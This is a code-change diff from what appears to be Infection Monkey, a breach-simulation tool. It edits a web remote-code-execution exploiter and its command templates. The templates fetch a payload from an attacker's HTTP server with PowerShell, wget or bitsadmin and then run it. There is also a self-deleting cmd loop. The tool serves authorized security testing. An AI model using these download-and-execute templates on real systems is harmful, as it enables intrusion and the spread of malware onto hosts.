Bugfix: model.__init__ changed( I forgot to add the file to the branch) and server lock is not a singleton anymore

infection_monkey/exploit/web_rce.py

@@ -13,8 +13,6 @@ __author__ = 'VakarisZ'
 
 LOG = logging.getLogger(__name__)
 
-LOCK = Lock()
-
 class WebRCE(HostExploiter):
 
     def __init__(self, host):
@@ -237,14 +235,15 @@ class WebRCE(HostExploiter):
             return False
         # Determine which destination path to use
         LOG.debug("Monkey path found")
+        lock = Lock()
         path = WebRCE.get_monkey_dest_path(config, src_path)
         if not path:
             return False
         # To avoid race conditions we pass a locked lock to http servers thread
-        LOCK.acquire()
+        lock.acquire()
         # Create server for http download and wait for it's startup.
-        http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, LOCK)
-        LOCK.acquire()
+        http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, lock)
+        lock.acquire()
         if not http_path:
             LOG.debug("Exploiter failed, http transfer creation failed.")
             return False
@@ -278,7 +277,7 @@ class WebRCE(HostExploiter):
             LOG.info("Powershell not found in host. Using bitsadmin to download.")
             backup_command = RDP_CMDLINE_HTTP % {'monkey_path': path, 'http_path': http_path}
             resp = exploiter(url, backup_command)
-        LOCK.release()
+        lock.release()
         http_thread.join(DOWNLOAD_TIMEOUT)
         http_thread.stop()
         LOG.info("Uploading proccess finished")

infection_monkey/model/__init__.py

@@ -17,13 +17,19 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
 DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
 
 # Commands used for downloading monkeys
-POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
-WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
-RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %%(type)s %%(parameters)s'
-
+POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
+POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
+WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
+RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
+CHMOD_MONKEY = "chmod +x %(monkey_path)s"
+RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
 # Commands used to check for architecture and if machine is exploitable
-CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
-CHECK_LINUX = "echo %s && lscpu" % ID_STRING
+CHECK_COMMAND = "echo %s" % ID_STRING
+# Architecture checking commands
+ARCH_WINDOWS = "wmic os get osarchitecture"
+ARCH_LINUX = "lscpu"
 
 # Commands used to check if monkeys already exists
-EXISTS = "ls %s"
+EXISTS = "ls %s"
+
+DOWNLOAD_TIMEOUT = 300